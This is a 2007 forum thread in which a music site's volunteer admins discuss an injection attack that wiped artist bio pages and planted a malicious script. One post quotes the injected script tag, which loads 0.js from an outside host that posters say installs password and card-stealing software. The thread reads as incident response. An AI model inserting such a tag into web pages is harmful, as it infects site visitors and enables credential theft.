Anathema: Left overs from the recent hack |
Post Reply |
Author | |
Atkingani
Special Collaborator Honorary Collaborator / Retired Admin Joined: October 21 2005 Location: Terra Brasilis Status: Offline Points: 12288 |
Topic: Anathema: Left overs from the recent hack Posted: December 28 2007 at 15:41 |
The main database is still off... maybe M@x is recovering it.
|
|
Guigo
~~~~~~ |
|
Angelo
Special Collaborator Honorary Collaborator / Retired Admin Joined: May 07 2006 Location: Italy Status: Offline Points: 13244 |
Posted: December 28 2007 at 15:24 |
^ I'll Send you a PM
The problem seems to have been resolved, in that the script references are removed and all artist content restored. M@X seems to have taken care of things. In general: if this script does what it says on the pages Dean referred to, you should be fine if you run an up-to-date virus scanner on your computer. The script apparently tries to install software from the web that captures data like credit card number and passwords the moment they are typed in. Any good virus protection tool should catch those. People who don't have one installed I would advise to install and run one (Avast is a good free solution that has protected me for 5 years now) before submitting online credit card orders or accessing online banking services. Hope no big damage is done to anyone! Edited by Angelo - December 28 2007 at 15:34 |
|
ISKC Rock Radio
I stopped blogging and reviewing - so won't be handling requests. Promo's for ariplay can be sent to [email protected] |
|
Magic Mountain
Forum Senior Member Joined: March 21 2006 Location: United States Status: Offline Points: 163 |
Posted: December 28 2007 at 14:49 |
I have gone to the forum main page and did not see "the c.uc8010.com/0.js script address on the page" referred to above and my virus software did not catch it. The main page did not load and had the message "Error on he Page" in the lower left-hand corner of the browser. Does this mean the script has executed and all of my passwords and credit card information has been transmitted? What is my next step?
|
|
Dean
Special Collaborator Retired Admin and Amateur Layabout Joined: May 13 2007 Location: Europe Status: Offline Points: 37575 |
Posted: December 28 2007 at 13:40 |
My initial thoughs are confirmed - the Forum main page is also affected.
The 0.js script from c.uc8010.com is the same script that hit many websites back in November: http://www.websense.com/securitylabs/blog/blog.php?BlogID=160
If you see the c.uc8010.com/0.js script address on the page then it has not executed - the scary bit is when you don't see it, because it probably has executed, however apparently anti-virus software is catching it.
If you know how, then set your IP blocker to block address 61.188.39.218
If you are unprotected, then keep away from the PA until the problem is fixed.
|
|
What?
|
|
Angelo
Special Collaborator Honorary Collaborator / Retired Admin Joined: May 07 2006 Location: Italy Status: Offline Points: 13244 |
Posted: December 28 2007 at 13:16 |
Where did you find that. Dean?
Thank god we have NoScript, and that on most pages it is inserted in the wrong place (it's being displayed as text rather than executed...) Edited by Angelo - December 28 2007 at 13:18 |
|
ISKC Rock Radio
I stopped blogging and reviewing - so won't be handling requests. Promo's for ariplay can be sent to [email protected] |
|
Dean
Special Collaborator Retired Admin and Amateur Layabout Joined: May 13 2007 Location: Europe Status: Offline Points: 37575 |
Posted: December 28 2007 at 12:56 |
Run and hide.
This one is nasty. It originates from China and is designed to attach itself to your browser for stealing passwords and credit card numbers.
|
|
What?
|
|
Angelo
Special Collaborator Honorary Collaborator / Retired Admin Joined: May 07 2006 Location: Italy Status: Offline Points: 13244 |
Posted: December 28 2007 at 12:55 |
^Not a lot I expect.... I sent the contents of the script to Bob, so he can pass it on to M@X.
|
|
ISKC Rock Radio
I stopped blogging and reviewing - so won't be handling requests. Promo's for ariplay can be sent to [email protected] |
|
Dim
Prog Reviewer Joined: April 17 2007 Location: Austin TX Status: Offline Points: 6890 |
Posted: December 28 2007 at 12:47 |
Damn, is there anything we can do?
|
|
|
|
Angelo
Special Collaborator Honorary Collaborator / Retired Admin Joined: May 07 2006 Location: Italy Status: Offline Points: 13244 |
Posted: December 28 2007 at 12:40 |
Is M@X aware? Could be useful to temporarily disconnect the server from the web (either physically or through software) to avoid more damage...
|
|
ISKC Rock Radio
I stopped blogging and reviewing - so won't be handling requests. Promo's for ariplay can be sent to [email protected] |
|
Tuzvihar
Special Collaborator Honorary Collaborator Joined: May 18 2005 Location: C. Schinesghe Status: Offline Points: 13536 |
Posted: December 28 2007 at 12:32 |
I went to the Admin Zone and took the option Update artists (it loads very slow!) - it seems all data is gone!!! All I could find there is: <script src=http://c.uc8010.com/0.js></script>.
Edited by Tuzvihar - December 28 2007 at 12:36 |
|
"Music is much like f**king, but some composers can't climax and others climax too often, leaving themselves and the listener jaded and spent."
Charles Bukowski |
|
Dean
Special Collaborator Retired Admin and Amateur Layabout Joined: May 13 2007 Location: Europe Status: Offline Points: 37575 |
Posted: December 28 2007 at 12:12 |
Yep, this is a new attack - even the main forum page is taking minutes to load.
If there is anything you want me to do just ask, (not that the prospect of rebuilding the bio pages is cheering me up any).
|
|
What?
|
|
chamberry
Special Collaborator Honorary Collaborator Joined: October 24 2005 Location: Puerto Rico Status: Offline Points: 9008 |
Posted: December 28 2007 at 11:39 |
Also, the streamable MP3s are missing.
|
|
|
|
Tuzvihar
Special Collaborator Honorary Collaborator Joined: May 18 2005 Location: C. Schinesghe Status: Offline Points: 13536 |
Posted: December 28 2007 at 11:36 |
I randomly checked also Le Orme, Porcupine tree, Vangelis... It looks like it affected every artist page.
|
|
"Music is much like f**king, but some composers can't climax and others climax too often, leaving themselves and the listener jaded and spent."
Charles Bukowski |
|
chamberry
Special Collaborator Honorary Collaborator Joined: October 24 2005 Location: Puerto Rico Status: Offline Points: 9008 |
Posted: December 28 2007 at 11:34 |
Just found out that John Zorn's band page looks weird too:
http://www.progarchives.com/artist.asp?id=2212 |
|
|
|
Easy Livin
Special Collaborator Honorary Collaborator / Retired Admin Joined: February 21 2004 Location: Scotland Status: Offline Points: 15585 |
Posted: December 28 2007 at 10:58 |
I think this must be a new bug. I've contacted M@x about it but it looks more prosaic.
|
|
Atkingani
Special Collaborator Honorary Collaborator / Retired Admin Joined: October 21 2005 Location: Terra Brasilis Status: Offline Points: 12288 |
Posted: December 28 2007 at 10:54 |
I checked randomly BACAMARTE page and there's a problem there too... and I cannot access properly the entire database right now.
Are we under attack? Edited by Atkingani - December 28 2007 at 10:55 |
|
Guigo
~~~~~~ |
|
Tuzvihar
Special Collaborator Honorary Collaborator Joined: May 18 2005 Location: C. Schinesghe Status: Offline Points: 13536 |
Posted: December 28 2007 at 10:53 |
My post from the other thread:
I couldn't find it... |
|
"Music is much like f**king, but some composers can't climax and others climax too often, leaving themselves and the listener jaded and spent."
Charles Bukowski |
|
Atkingani
Special Collaborator Honorary Collaborator / Retired Admin Joined: October 21 2005 Location: Terra Brasilis Status: Offline Points: 12288 |
Posted: December 28 2007 at 10:50 |
I'm afraid the problem could be worse...
Check the ULVER page:
|
|
Guigo
~~~~~~ |
|
Angelo
Special Collaborator Honorary Collaborator / Retired Admin Joined: May 07 2006 Location: Italy Status: Offline Points: 13244 |
Posted: December 28 2007 at 10:35 |
Van Der Graaff Generator bio is also damaged and the picture gone....
|
|
ISKC Rock Radio
I stopped blogging and reviewing - so won't be handling requests. Promo's for ariplay can be sent to [email protected] |
|
Angelo
Special Collaborator Honorary Collaborator / Retired Admin Joined: May 07 2006 Location: Italy Status: Offline Points: 13244 |
Posted: December 28 2007 at 08:11 |
I found this in Report Bugs here: http://www.progarchives.com/forum/forum_posts.asp?TID=44668 Probably also other bio's are affected... Edited by Angelo - December 28 2007 at 09:42 |
|
ISKC Rock Radio
I stopped blogging and reviewing - so won't be handling requests. Promo's for ariplay can be sent to [email protected] |
|
Post Reply | |
Forum Jump | Forum Permissions You cannot post new topics in this forum You cannot reply to topics in this forum You cannot delete your posts in this forum You cannot edit your posts in this forum You cannot create polls in this forum You cannot vote in polls in this forum |